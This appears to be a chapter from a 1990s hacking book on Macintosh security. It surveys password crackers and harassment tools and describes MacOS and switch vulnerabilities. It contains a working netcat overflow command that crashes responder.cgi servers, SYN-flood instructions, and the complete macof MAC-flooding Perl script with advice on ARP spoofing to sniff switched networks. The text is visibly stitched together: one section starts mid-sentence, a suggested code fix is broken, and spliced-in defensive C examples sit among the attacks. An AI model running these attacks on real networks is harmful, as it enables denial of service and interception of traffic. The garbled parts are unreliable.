Macintosh

The Macintosh platform is not traditionally known for being a cracking platform. It is far more suited to hacking. Programming for the Mac is every bit as challenging as programming for any other environment. Knowledge of C is generally a requisite. For that reason, hacking on the Mac platform can be fun (and occasionally frustrating). Cracking (with respect to the Internet anyway) on the Mac platform, however, is another matter entirely.

First, early TCP/IP implementations on the Mac platform were primarily client oriented. Many server packages do now exist for the Mac, but until recently, TCP/IP was not what I would call an "integrated" part of the traditional MacOS. Today, the situation is vastly different. The advancement of integrated TCP/IP in the MacOS has grown tremendously.

Apple has taken special steps to ensure that the MacOS TCP/IP support is superb. These efforts have manifested through the development of Open Transport technology. Open Transport is an implementation that provides high-level control at the network level. For example, Open Transport allows multiple, simultaneous TCP/IP connections, the number of which is limited only by memory and processor power. Inherent within the system is automated flow control, which detects the need for fragmentation of IP datagrams. That means when a network segment is encountered that cannot handle large packets, Open Transport automatically reverts to fragmentation.

Open Transport has completely integrated MacOS with both TCP/IP and AppleTalk, making it one of the most flexible networking implementations currently available.

Programming on the Mac is a challenge. However, most Macintosh users are not so intensely preoccupied with the inner workings of their operating system as users of UNIX systems or even IBM compatibles. The reason has nothing to do with the level of proficiency of Mac users. It has to do with the design of the MacOS itself. The MacOS was conceived with ease of use in mind. Many tasks that are grueling under other operating systems are only a click away on the modern Macintosh. Take, for example, getting connected to the Internet. Only in the last few years have UNIX systems made this process simple. Prior to that, many different files had to be edited correctly and the user had to have some knowledge of UUCP. In contrast, the Mac user is rarely confronted with special configuration problems that call for tweaking the operating system. Therefore, there are few Mac Internet crackers.

Password Crackers and Related Utilities

The utilities described in the following sections are popular password crackers or related utilities for use on Macintosh. Some are made specifically to attack Mac-oriented files. Others are designed to crack UNIX password files. This is not an exhaustive list, but rather a sample of the more interesting tools freely available on the Internet.

PassFinder

PassFinder is a password cracking utility used to crack the administrator password on FirstClass systems. This is an important utility. The program suite FirstClass is a gateway system, commonly used for serving e-mail, UUCP, and even news (NNTP). In essence, FirstClass (which can be found at http://www.softarc.com/) is a total solution for mail, news, and many other types of TCP/IP-based communication systems. It is a popular system on the MacOS platform. (It even has support for Gopher servers and FTP and can be used to operate a full-fledged BBS.) Because FirstClass servers exist not only on outbound Internet networks, but also on intranets, PassFinder is a critical tool. By cracking the administrator password, a user can seize control of the system's incoming and outgoing electronic communications. (However, this must be done on the local machine. That is, the user must have access to the console of the machine in question. This is not a remote cracking utility.)

FirstClass Thrash!

This is an interesting collection of utilities, primarily designed for conducting warfare over (or against) a FirstClass BBS. Its features could easily be likened to those of Maohell: mailbombing tools, denial-of-service tools, and other assorted scripts useful for harassing one's enemies.

FMProPeeker

This utility cracks FileMaker Pro files. FileMaker Pro is a database solution from Claris (http://www.claris.com). While more commonly associated with the Macintosh platform, FileMaker Pro now runs on a variety of systems. It is available for shared database access on Windows NT networks, for example. In any event, FMProPeeker subverts the security of FileMaker Pro files.

FMP Password Viewer Gold 2.0

FMP Password Viewer Gold 2.0 is another utility for cracking FileMaker Pro files.

Password Killer

Password Killer is designed to circumvent the majority of PowerBook security programs.

Killer Cracker

Killer Cracker is a Macintosh port of Killer Cracker, a password cracker formerly run only on DOS and UNIX-based machines. Thankfully, the Mac version is distributed as a binary; that means you do not need a compiler to build it.

MacKrack

MacKrack is a port of Muffett's famous Crack 4.1. It is designed to crack UNIX passwords. It rarely comes with dictionary files, but works quite well, and it makes cracking UNIX /etc/passwd files a cinch. (It has support for both 68K and PPC.)

Unserialize Photoshop

Unserialize Photoshop is a standard serial number-killing utility, designed to circumvent serial number protection on Adobe Photoshop. This utility really falls into the traditional cracking category. I don't think that this type of activity does much to shed light on security issues. It is basically a tool to steal software. Therefore, I will refrain from offering any locations here. Adobe is a good company--perhaps the only company ever to get the best of Microsoft. My position on stealing software (though I've stated it before) is this: You want free software? Get FreeBSD or Linux and go GNU.

WordListMaker

WordListMaker is a utility designed to manage dictionary files. This is invaluable if you plan to crack password files of any size, or files on which the users may speak more than one language (forcing you to use not only American English dictionaries, but perhaps others, including British English, Italian, French, German, and so forth). The utility is designed to merge dictionary files, a function that on a UNIX system takes no more than a brief command line but that, on many other platforms, can be a laborious task.

Remove Passwords

Remove Passwords is a nifty utility that removes the password protection on StuffIt archives. StuffIt is an archiving utility much like PKZIP or GZIP. It is more commonly seen on the Macintosh platform, but has since been ported to others, including Microsoft Windows. You can acquire StuffIt at ftp://ftp.aladdinsys.com/. Remove Passwords bypasses password protection on any archive created (and password protected) with StuffIt.

RemoveIt

RemoveIt is a utility almost identical to Remove Passwords. It strips the passwords from StuffIt archives.

MacPassword

The industry standard for full password protection on MacOS, MacPassword is a fully developed commercial application. It provides not only multiple levels of password protection (for both disk and screen), but it also incorporates virus scanning technology. It's definitely worth the money. However, you can always check it out for free.

Holes in MAC

Responder.cgi Vulnerability

responder.cgi, a public domain 'C' shell for MacHTTP CGI servers, contains a buffer overflow that, when exploited, will cause the server it runs on to freeze. You are at risk if your responder.cgi file contains the line of code:

char PostArg_Search[256];

which holds the QUERY_STRING. Since it only allows up to 256 characters after the ?, the server will crash if 257 or more characters are requested.

Exploit Example: (nc is netcat from avian.org)

$ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80

Possible Workaround:

Remove responder.cgi from your /cgi-bin/ or change char PostArg_Search[256]; to

char PostArg_Search;
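Independent of the workaround above, the defect is a copy of QUERY_STRING into PostArg_Search that is not bounded by the buffer's declared size. The following is an added example, not code from responder.cgi or MacHTTP: the same 256-byte buffer, filled only after checking that the query fits, so a request like the one in the exploit example gets an HTTP error instead of crashing the server. The functions, the 414 response and the run_demo helper are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Copy query into dst (capacity dstsz), NUL-terminated. Returns 0 on
 * success, -1 when it does not fit; never writes past dst[dstsz-1]. */
int copy_query_arg(const char *query, char *dst, size_t dstsz)
{
    if (query == NULL || dst == NULL || dstsz == 0) return -1;
    const char *end = memchr(query, '\0', dstsz);  /* scan dstsz bytes only */
    if (end == NULL) {                /* 256 or more characters: refuse */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, query, (size_t)(end - query) + 1);
    return 0;
}

/* One request: an over-long QUERY_STRING gets an HTTP error response
 * instead of an overrun. Returns the status code used. */
int handle_query(const char *query, char *out, size_t outsz)
{
    char PostArg_Search[256];         /* the buffer the page describes */
    if (copy_query_arg(query, PostArg_Search, sizeof PostArg_Search) != 0) {
        snprintf(out, outsz, "Status: 414 Request-URI Too Long\r\n\r\n");
        return 414;
    }
    snprintf(out, outsz, "Content-Type: text/plain\r\n\r\nsearch=%s\n",
             PostArg_Search);
    return 200;
}

/* Constructed input: `len` 'x' characters, like the page's exploit example.
 * Returns the status handle_query produces for it. */
int run_demo(size_t len)
{
    char query[1024], out[1280];
    if (len >= sizeof query) len = sizeof query - 1;
    memset(query, 'x', len);
    query[len] = '\0';
    return handle_query(query, out, sizeof out);
}

int main(void)
{
    const char *q = getenv("QUERY_STRING");  /* set by the web server */
    char out[1280];
    handle_query(q ? q : "", out, sizeof out);
    return fputs(out, stdout) == EOF;
}
```

Note that 255 characters plus the terminating NUL is the most a 256-byte buffer can hold, so a 256-character query is refused as well.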

Killing the Bandwidth

You can kill all the bandwidth out of MacOS up to 8.* by finding an open port (only one is needed) and using the synk command line "synk 0 ip open_port then_the_next_port". The MacOS TCP/IP stack can't handle SYN floods, and in turn this takes all bandwidth away from that box. Keep it up for 5 minutes or so and all connections from the box _should_ die (telnets/ftps/ircs/etc.).

Due to limitations of ARP/MAC tables, switches could start sending packets to all ports, and other network devices could hang, crash or reboot if they receive lots of MAC addresses.

Threat: Someone could eavesdrop/sniff network connections over a switched network. Denial of service attacks on a local network.

Platform: Verified on a 3com SuperStack Switch 3300 (3c16981 Hardware v.1 Software v.2.10). Very possibly other network devices.

Solution: There is no known solution to the problem today.

Vulnerability Description

Scenario:

Computer A talks with computer B.

Computer C is running macof.

Computers A, B and C are connected to the same 3com switch.

When running macof ( http://quake.skif.net/RawIP/macof.html ), a Perl program included with the Perl module Net::RawIP ( http://quake.skif.net/RawIP/ ), through a 3com SuperStack Switch 3300 (3c16981 Hardware v.1 Software v.2.10), the switch starts to send all network packets from computer A to both computer B and computer C.

Solution

There is no known solution to the problem today. As a workaround for switches you could, where available, lock a MAC address to every port on the switch.

Background:

At DefCon VI there were discussions about switches. Some people acquire a switch because you could not eavesdrop on a network connection over it. Someone said that if you send a special multicast to a switch you could spoof another switch, and the switch should thereby start sending you network packets. In these attempts we discovered that you could easily spoof a MAC address and thereby confuse a switch, because the switch tries to remember which MAC addresses are on each port. Because some network packets go to the spoofing MAC, you get problems with the connections (resends). But what happens if the switch gets flooded with MAC addresses? The switch only has a bounded memory space for the MAC addresses on each port. What happens if this table gets full? After a few tests (with macof) we got different results depending on the brand of the switch. Some switches stopped working and others started to forward network traffic to wrong or all ports. The only scientific analysis is the one reported here. This is a resource problem.

3com was informed about this problem on 21/4 1999.

macof is just one way to do it. We think that the best way to eavesdrop on a connection over a switch is to spoof the default router and send ARP redirects with your MAC address as the "changing to" address, and route the incoming packets to the default router's MAC address.
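The condition the advisory describes is a bounded forwarding table being filled with new source addresses. The following is an added, defender-side example, not part of the advisory or of macof: it walks a constructed set of raw Ethernet frames, keeps its own bounded table of distinct source MACs, and raises an alert when that table fills faster than a normal segment would fill it. The table size, the threshold and the simulate helper are assumptions for illustration.

```c
#include <stdint.h>
#include <string.h>
#define MAX_TRACKED 64       /* assumed size of our own tracking table */
#define ALERT_THRESHOLD 32   /* assumed: alert above this many sources */
struct mac_tracker { uint8_t seen[MAX_TRACKED][6]; size_t count; int saturated; };

/* Record the frame's source MAC (bytes 6..11 of the Ethernet header).
 * Returns 1 if the address had not been seen before, else 0. */
int track_frame(struct mac_tracker *t, const uint8_t *frame, size_t len)
{
    if (len < 14) return 0;           /* shorter than an Ethernet header */
    const uint8_t *src = frame + 6;
    for (size_t i = 0; i < t->count; i++)
        if (memcmp(t->seen[i], src, 6) == 0) return 0;
    if (t->count == MAX_TRACKED) { t->saturated = 1; return 1; }
    memcpy(t->seen[t->count++], src, 6);
    return 1;
}

/* A bounded table filling up with new sources is exactly the condition
 * macof creates in a switch; alert once ours passes the threshold. */
int flood_suspected(const struct mac_tracker *t)
{
    return t->saturated || t->count > ALERT_THRESHOLD;
}

/* Constructed frame: broadcast destination, source derived from n,
 * EtherType 0x0800 (IPv4). Only the 14-byte header matters here. */
static void make_frame(uint8_t *f, unsigned n)
{
    memset(f, 0xff, 6);
    f[6] = 0x02; f[7] = (uint8_t)(n >> 24); f[8] = (uint8_t)(n >> 16);
    f[9] = (uint8_t)(n >> 8); f[10] = (uint8_t)n; f[11] = 0x01;
    f[12] = 0x08; f[13] = 0x00;
}

/* Feed `frames` frames drawn from `distinct` sources; returns 1 on alert.
 * A normal segment has few sources; under macof nearly every frame is new. */
int simulate(unsigned frames, unsigned distinct)
{
    struct mac_tracker t = {0};
    uint8_t f[14];
    if (distinct == 0) return 0;
    for (unsigned i = 0; i < frames; i++) {
        make_frame(f, i % distinct);
        track_frame(&t, f, sizeof f);
    }
    return flood_suspected(&t);
}
```

In practice the tracker would be reset per interval and fed from a capture on the monitored port, and the alert would be the trigger to check the switch's address table and port-locking configuration.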

//Ian Vitek

ian.vitek@infosec.se

Test program, macof:

#!/usr/bin/perl -w
#
# macof v. 1.1
# By Ian Vitek ( ian.vitek@infosec.se )
# Tests network devices by flooding local network with MAC-addresses.
#
# Needs Net::RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example: ./macof -e <mac_of_def_gate> -n 1000000
#          ./macof -r -n 1000000
#          (run it several times)
#
# Warning: This program could cause serious problems on your network.
#          This program could hang, crash or reboot network devices.
#          Switches could start sending packages to all ports making it
#          possible to intercept network traffic.
#
#
require 'getopts.pl';
use Net::RawIP;
Getopts('hvrs:e:d:x:y:i:n:');

sub GenMAC
{
  my $tmp_mac="00";
  my $i=0;
# generate random mac-address
  while($i++ < 5) {
    $tmp_mac.=":" . sprintf("%x",int rand 16);
    $tmp_mac.=sprintf("%x",int rand 16);
  }
  return($tmp_mac);
}
$a = new Net::RawIP;
die "usage: $0 [options]\
\t-d dest_host\t\t(def:random)\
\t-s source_host\t\t(def:random)\
\t-v \t\t\tprints generated mac-addresses\
\t-r | -e dest_mac \trandomize or set destination mac address\
\t\t\t\tshould be in format ff:ff:ff:ff:ff:ff or host\
\t-x source_port\t\t(def:random)\
\t-y dest_port \t\t(def:random)\
\t-i interface \t\tset sending interface \t\t(def:eth0)\
\t-n times\t\tset number of times to send \t(def:1)\
\t-h this help\n" unless ( !$opt_h && !($opt_r && $opt_e) );
# set default values (interface name quoted: a bareword here only
# works by accident without 'use strict')
$opt_i='eth0' unless $opt_i;
$opt_n=1 unless $opt_n;
$s_host=$opt_s if $opt_s;
$d_host=$opt_d if $opt_d;
$s_port=$opt_x if $opt_x;
$d_port=$opt_y if $opt_y;
# choose network card
if($opt_e) {
  $a->ethnew($opt_i, dest => $opt_e);
} else {
  $a->ethnew($opt_i);
}
# Loop
for($times=0; $times < $opt_n; $times++) {
# Check if one or two mac-addresses should be generated
  $mac=&GenMAC;
  if($opt_r) {
    $d_mac=&GenMAC;
    print "$d_mac \t$mac\n" if($opt_v);
#   set mac-addresses
    $a->ethset(source => $mac, dest => $d_mac);
  } else {
    print "$mac\n" if($opt_v);
#   set mac-address
    $a->ethset(source => $mac);
  }
# generate random source and destination ip-addresses
  $s_host=17000000+int rand 4261000000 unless $opt_s;
  $d_host=17000000+int rand 4261000000 unless $opt_d;
# generate random source and dest ports
  $s_port=int rand 65535 unless $opt_x;
  $d_port=int rand 65535 unless $opt_y;
# set network package
  $a->set({ip => {saddr => $s_host, daddr => $d_host},
           tcp => {source => $s_port, dest => $d_port}
          });
# send
  $a->ethsend;
}

Apple "Web Sharing" in MacOS 8.5.1

to port 80 on an Apple Mac running MacOS 8.5.1 with Web Sharing enabled makes it change from "Web Sharing On" to "Web Sharing Off", presumably because the web server task dies. An annoying DoS, possibly worse, who knows (it depends on whether they compiled with range checking on, what language they used, etc.).

Macintosh version of Word '98 includes sensitive material in document files.

Since Word ignores the logical end of file and includes the entire contents of the final disk sector in the file, other information can be placed in a document file. When this file is sent to other recipients, the hidden data is sent with it. This data is not viewable in Word, but any binary editor can view the file and reveal the information in it. Although Microsoft claims only information from the hard drive is placed in the document (a bad thing by itself!), several reports mention that information from memory is included as well.

Although the Mac platform is not known for being a cracking platform, it is well suited for hacking. Hacking on the Mac platform can be fun; cracking is another matter entirely. This chapter covers a multitude of utilities for hacking and cracking using the Macintosh platform, and also discusses ways to keep hackers and crackers out.